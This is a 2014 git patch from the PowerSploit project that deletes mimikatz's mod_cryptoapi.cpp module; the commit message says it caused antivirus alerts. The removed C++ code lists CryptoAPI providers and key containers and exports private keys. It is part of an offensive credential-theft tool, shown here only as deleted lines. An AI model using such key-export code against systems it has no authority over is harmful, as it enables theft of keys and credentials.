From c5168cdba6a3b2d7dd8d79c8ac9583d3ace6a504 Mon Sep 17 00:00:00 2001 From: mattifestation Date: Mon, 3 Feb 2014 17:13:35 -0500 Subject: Removed mimikatz. This doesn't need to reside in PowerSploit. Those that are truly paranoid should validate that the embedded executable in Invoke-Mimikatz.ps1 is indeed mimikatz. This was causing AV to flag upon downloading PowerSploit. --- .../mimikatz-1.0/modules/mod_cryptoapi.cpp | 138 --------------------- 1 file changed, 138 deletions(-) delete mode 100644 Exfiltration/mimikatz-1.0/modules/mod_cryptoapi.cpp (limited to 'Exfiltration/mimikatz-1.0/modules/mod_cryptoapi.cpp') diff --git a/Exfiltration/mimikatz-1.0/modules/mod_cryptoapi.cpp b/Exfiltration/mimikatz-1.0/modules/mod_cryptoapi.cpp deleted file mode 100644 index f886f09..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_cryptoapi.cpp +++ /dev/null @@ -1,138 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_cryptoapi.h" -HMODULE mod_cryptoapi::hRsaEng = NULL; - -bool mod_cryptoapi::loadRsaEnh() -{ - if(!hRsaEng) - hRsaEng = LoadLibrary(L"rsaenh"); - return (hRsaEng != NULL); -} - -bool mod_cryptoapi::unloadRsaEnh() -{ - if(hRsaEng) - FreeLibrary(hRsaEng); - return true; -} - -bool mod_cryptoapi::getProviderString(wstring ProviderName, wstring * Provider) -{ - map mesProviders; - mesProviders.insert(make_pair(L"MS_DEF_PROV", MS_DEF_PROV)); - mesProviders.insert(make_pair(L"MS_ENHANCED_PROV", MS_ENHANCED_PROV)); - mesProviders.insert(make_pair(L"MS_STRONG_PROV", MS_STRONG_PROV)); - mesProviders.insert(make_pair(L"MS_DEF_RSA_SIG_PROV", MS_DEF_RSA_SIG_PROV)); - mesProviders.insert(make_pair(L"MS_DEF_RSA_SCHANNEL_PROV", MS_DEF_RSA_SCHANNEL_PROV)); - mesProviders.insert(make_pair(L"MS_DEF_DSS_PROV", MS_DEF_DSS_PROV)); - mesProviders.insert(make_pair(L"MS_DEF_DSS_DH_PROV", MS_DEF_DSS_DH_PROV)); - mesProviders.insert(make_pair(L"MS_ENH_DSS_DH_PROV", MS_ENH_DSS_DH_PROV)); - mesProviders.insert(make_pair(L"MS_DEF_DH_SCHANNEL_PROV", MS_DEF_DH_SCHANNEL_PROV)); - mesProviders.insert(make_pair(L"MS_SCARD_PROV", MS_SCARD_PROV)); - mesProviders.insert(make_pair(L"MS_ENH_RSA_AES_PROV", MS_ENH_RSA_AES_PROV)); - mesProviders.insert(make_pair(L"MS_ENH_RSA_AES_PROV_XP", MS_ENH_RSA_AES_PROV_XP)); - - map::iterator monIterateur = mesProviders.find(ProviderName); - *Provider = (monIterateur != mesProviders.end()) ? monIterateur->second : ProviderName; - return true; -} - -bool mod_cryptoapi::getProviderTypeFromString(wstring ProviderTypeName, DWORD * ProviderType) -{ - map mesTypes; - mesTypes.insert(make_pair(L"PROV_RSA_FULL", PROV_RSA_FULL)); - mesTypes.insert(make_pair(L"PROV_RSA_SIG", PROV_RSA_SIG)); - mesTypes.insert(make_pair(L"PROV_DSS", PROV_DSS)); - mesTypes.insert(make_pair(L"PROV_FORTEZZA", PROV_FORTEZZA)); - mesTypes.insert(make_pair(L"PROV_MS_EXCHANGE", PROV_MS_EXCHANGE)); - mesTypes.insert(make_pair(L"PROV_SSL", PROV_SSL)); - mesTypes.insert(make_pair(L"PROV_RSA_SCHANNEL", PROV_RSA_SCHANNEL)); - mesTypes.insert(make_pair(L"PROV_DSS_DH", PROV_DSS_DH)); - mesTypes.insert(make_pair(L"PROV_EC_ECDSA_SIG", PROV_EC_ECDSA_SIG)); - mesTypes.insert(make_pair(L"PROV_EC_ECNRA_SIG", PROV_EC_ECNRA_SIG)); - mesTypes.insert(make_pair(L"PROV_EC_ECDSA_FULL",PROV_EC_ECDSA_FULL)); - mesTypes.insert(make_pair(L"PROV_EC_ECNRA_FULL",PROV_EC_ECNRA_FULL)); - mesTypes.insert(make_pair(L"PROV_DH_SCHANNEL", PROV_DH_SCHANNEL)); - mesTypes.insert(make_pair(L"PROV_SPYRUS_LYNKS", PROV_SPYRUS_LYNKS)); - mesTypes.insert(make_pair(L"PROV_RNG", PROV_RNG)); - mesTypes.insert(make_pair(L"PROV_INTEL_SEC", PROV_INTEL_SEC)); - mesTypes.insert(make_pair(L"PROV_REPLACE_OWF", PROV_REPLACE_OWF)); - mesTypes.insert(make_pair(L"PROV_RSA_AES", PROV_RSA_AES)); - - map::iterator monIterateur = mesTypes.find(ProviderTypeName); - if(monIterateur != mesTypes.end()) - { - *ProviderType = monIterateur->second; - return true; - } - else return false; -} - -bool mod_cryptoapi::getVectorProviders(vector * monVectorProviders) -{ - DWORD index = 0; - DWORD provType; - DWORD tailleRequise; - - while(CryptEnumProviders(index, NULL, 0, &provType, NULL, &tailleRequise)) - { - wchar_t * monProvider = new wchar_t[tailleRequise]; - if(CryptEnumProviders(index, NULL, 0, &provType, monProvider, &tailleRequise)) - { - monVectorProviders->push_back(monProvider); - } - delete[] monProvider; - index++; - } - return (GetLastError() == ERROR_NO_MORE_ITEMS); -} - -bool mod_cryptoapi::getVectorContainers(vector * monVectorContainers, bool isMachine, wstring provider, DWORD providerType) -{ - bool reussite = false; - - HCRYPTPROV hCryptProv = NULL; - if(CryptAcquireContext(&hCryptProv, NULL, provider.c_str(), providerType, CRYPT_VERIFYCONTEXT | (isMachine ? CRYPT_MACHINE_KEYSET : NULL))) - { - DWORD tailleRequise = 0; - char * containerName = NULL; - DWORD CRYPT_first_next = CRYPT_FIRST; - bool success = false; - - success = (CryptGetProvParam(hCryptProv, PP_ENUMCONTAINERS, NULL, &tailleRequise, CRYPT_first_next) != 0); - while(success) - { - containerName = new char[tailleRequise]; - if(success = (CryptGetProvParam(hCryptProv, PP_ENUMCONTAINERS, reinterpret_cast(containerName), &tailleRequise, CRYPT_first_next) != 0)) - { - wstringstream resultat; - resultat << containerName; - monVectorContainers->push_back(resultat.str()); - } - delete[] containerName; - CRYPT_first_next = CRYPT_NEXT; - } - reussite = (GetLastError() == ERROR_NO_MORE_ITEMS); - CryptReleaseContext(hCryptProv, 0); - } - - return reussite; -} - -bool mod_cryptoapi::getPrivateKey(HCRYPTKEY maCle, PBYTE * monExport, DWORD * tailleExport, DWORD dwBlobType) -{ - bool reussite = false; - - if(CryptExportKey(maCle, NULL, dwBlobType, NULL, NULL, tailleExport)) - { - *monExport = new BYTE[*tailleExport]; - if(!(reussite = (CryptExportKey(maCle, NULL, dwBlobType, NULL, *monExport, tailleExport) != 0))) - delete[] monExport; - - } - return reussite; -} \ No newline at end of file -- cgit v1.2.3